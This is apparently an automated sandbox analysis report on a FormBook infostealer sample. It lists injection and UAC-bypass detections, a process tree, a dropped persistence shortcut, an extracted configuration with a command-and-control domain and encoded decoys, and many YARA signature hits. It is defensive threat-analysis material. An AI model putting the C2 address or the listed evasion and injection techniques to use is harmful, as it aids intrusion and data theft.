Edit tour

Windows Analysis Report
1a#U00bb.exe

Overview

General Information

Sample Name:	1a#U00bb.exe
Analysis ID:	680373
MD5:	251ef95e26d436e7bfe64636978dcc4b
SHA1:	20e2ea6899d155780231abde49730046865c046b
SHA256:	15e1d48f4ba136aa876c88c4fb16fe160795f40e9850252ce1a4f3a695b4fcb7
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected UAC Bypass using ComputerDefaults

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

1a#U00bb.exe (PID: 6128 cmdline: "C:\Users\user\Desktop\1a#U00bb.exe" MD5: 251EF95E26D436E7BFE64636978DCC4B)

cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Djfypqyfx.exe (PID: 5068 cmdline: "C:\Users\Public\Libraries\Djfypqyfx.exe" MD5: 251EF95E26D436E7BFE64636978DCC4B)

cmd.exe (PID: 5432 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wscript.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

Djfypqyfx.exe (PID: 5460 cmdline: "C:\Users\Public\Libraries\Djfypqyfx.exe" MD5: 251EF95E26D436E7BFE64636978DCC4B)

cmd.exe (PID: 768 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bradwareham.com/2dou/"], "decoy": ["/OEd9KnwK/iP", "zlyDQht5zbJFuAXSIdTUjw==", "kDYUq8UfDwCluA34CDyS", "7HZOV1qT4rFI5mpJrcnoWVc=", "nnBRxMHdw4wosAXSIdTUjw==", "sdQ/2s4XC8g0MFFBBEfViR1V", "oHDnk6LHnHUHiwsLn33GBcm+egCb", "yV2U0Zf13bN3D3x7Df9++fDhF7CILTul", "cUbD5d4TmWcGB+BgyA==", "Kky9XlCLiTQfNUk1/zQ=", "ejVhmGLOqY9fiNPrefZMfFM=", "lVvGdVA2G/K9r8Bdwg==", "Gj+ogjaA9c92ElYsqMnoWVc=", "9yiEqVFDpWT9JJ/cfNrPhw==", "j2DBby8l6rlNV1HhxqOa", "jJoCUeXDOwrETLssvPAFS1E=", "kTJX5Y2Uj2U13OlkcUguJN+eCqGILTul", "VQTbC33cwRTrePw=", "JhV0w4/tyLmFrur+5EHViR1V", "DyZj5vhGPxKtdLzixvlTWFHQU6hIAk2mWw==", "12U9E8X0E92F", "z5HQwa7lRi2/OI74c0aF", "bQsb5a29o3paQIHN6jQ=", "y5HYxYiVCAC5r8Bdwg==", "269NSBh1VCMCSeM=", "1nZZpmfNICP+pNv7WzY=", "bfkgXcI2E9GSQfb4CDyS", "GvZX5N4sGwu0tO8hAd65bfvI++iOb++t", "ESeLNUJmP7mFCVoMjPDFgDUpX+Y=", "VW3K5bgQ55UsXLXxs4aSyIi2I6SILTul", "w2ZJUGKeHeOB3x+d3w==", "Rl261Z+P5r1cXuL4CDyS", "iaoLqarFoIIPihgj/UTViR1V", "UfPoA+jvYE8i5PVr0oZz+3zDvu4=", "sEl4u1N7SiHI/oX5Yt8TVF2Rww==", "ihtTSoHvvRTrePw=", "SGa6AsX0E92F", "PtcQ3Y7RNg2wYOPselSgH7JSxncv8d0=", "5P9njGFf3aqSfNL9", "9I3Q/7YN8L1PYW8/qcnoWVc=", "mSlfnm7TqHUal+BXwQ==", "epsPWRx9lkIdSFxEED0=", "iLEhS0xp2aqSfNL9", "DrWkgDQmekHh72bApvZfh2Jxblk9/dU=", "myf+DvRILfrJbZfPXjw=", "dwHgvnjUtHMGi/Wr+SYM/o/9xg==", "z5mGlY+9EfKVFF79IdTUjw==", "02GPzaC8PxK683jjNoJ4eP3WASbMfw==", "cpz/Rh+BVC8Lywr4CDyS", "eh8D+QYnhE78OsL4c0aF", "fJvt8/Unr2kCJmilinFMOsIz3w==", "eiX8Y0x8Xyra/AUHl3PB/9G9X9NbYA==", "hzVzNdD6iSG0WJfPXjw=", "3XFOI99VVy3vkADSRnZLA8gjowStdw==", "gUuIy3iTa0PVWZfPXjw=", "u09/Bvc/PhPekNv7WzY=", "lzUY+MImAbtHXai84L2zq7xd", "tEh3sX3hyk0wbMr14ETViR1V", "q0k0lVzZVUXxnhwO7leqpagfowStdw==", "x+lIFdjd5smUWZ3pzQdimF8=", "fh9Sg0CljRTrePw=", "oHIeFMb0E92F", "23utFO8RLgGlvA34CDyS", "/hl0LfDlqXALM3vFqOZCPM2+egCb"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\xfyqpyfjD.url	Methodology_Shortcut_HotKey	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x59:$hotkey: \x0AHotKey=3 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\xfyqpyfjD.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.299959844.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.303458989.0000000002268000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.479329024.0000000003210000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.303584675.00000000025FD000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
0000000F.00000002.379536299.00000000022D8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingComputerDefaults	Yara detected UAC Bypass using ComputerDefaults	Joe Security
00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x667c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xd437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000000.460422107.000000000D48F000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x9e89:$sqlite3step: 68 34 1C 7B E1 0x9fbc:$sqlite3step: 68 34 1C 7B E1 0x9ecb:$sqlite3text: 68 38 2A 90 C5 0xa013:$sqlite3text: 68 38 2A 90 C5 0x9ee2:$sqlite3blob: 68 53 D8 7F 8C 0xa035:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xb0a9:$a1: 3C 30 50 4F 53 54 74 09 40 0x22268:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xf3e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1b5ff:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1b3fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1aea9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1b4ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1b677:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xefb2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1a0f4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xfcfa:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x20eaf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x21fd2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.381193910.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1d901:$sqlite3step: 68 34 1C 7B E1 0x1da34:$sqlite3step: 68 34 1C 7B E1 0x1d943:$sqlite3text: 68 38 2A 90 C5 0x1da8b:$sqlite3text: 68 38 2A 90 C5 0x1d95a:$sqlite3blob: 68 53 D8 7F 8C 0x1daad:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x663d:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7fc:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa97b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b93:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16991:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1643d:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a93:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16c0b:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa546:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15688:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb28e:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c443:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d566:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.309895318.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e95:$sqlite3step: 68 34 1C 7B E1 0x18fc8:$sqlite3step: 68 34 1C 7B E1 0x18ed7:$sqlite3text: 68 38 2A 90 C5 0x1901f:$sqlite3text: 68 38 2A 90 C5 0x18eee:$sqlite3blob: 68 53 D8 7F 8C 0x19041:$sqlite3blob: 68 53 D8 7F 8C
0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001E.00000002.537026751.00000000034A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6d19:$a1: 3C 30 50 4F 53 54 74 09 40 0x1ded8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb057:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1726f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1706d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16b19:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1716f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x172e7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xac22:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15d64:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb96a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1cb1f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1dc42:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.380920246.0000000003AD9000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19571:$sqlite3step: 68 34 1C 7B E1 0x196a4:$sqlite3step: 68 34 1C 7B E1 0x195b3:$sqlite3text: 68 38 2A 90 C5 0x196fb:$sqlite3text: 68 38 2A 90 C5 0x195ca:$sqlite3blob: 68 53 D8 7F 8C 0x1971d:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.488703408.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.301342863.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.479803163.0000000003470000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6631:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d7f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa96f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16985:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa53a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1567c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb282:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d55a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e89:$sqlite3step: 68 34 1C 7B E1 0x18fbc:$sqlite3step: 68 34 1C 7B E1 0x18ecb:$sqlite3text: 68 38 2A 90 C5 0x19013:$sqlite3text: 68 38 2A 90 C5 0x18ee2:$sqlite3blob: 68 53 D8 7F 8C 0x19035:$sqlite3blob: 68 53 D8 7F 8C
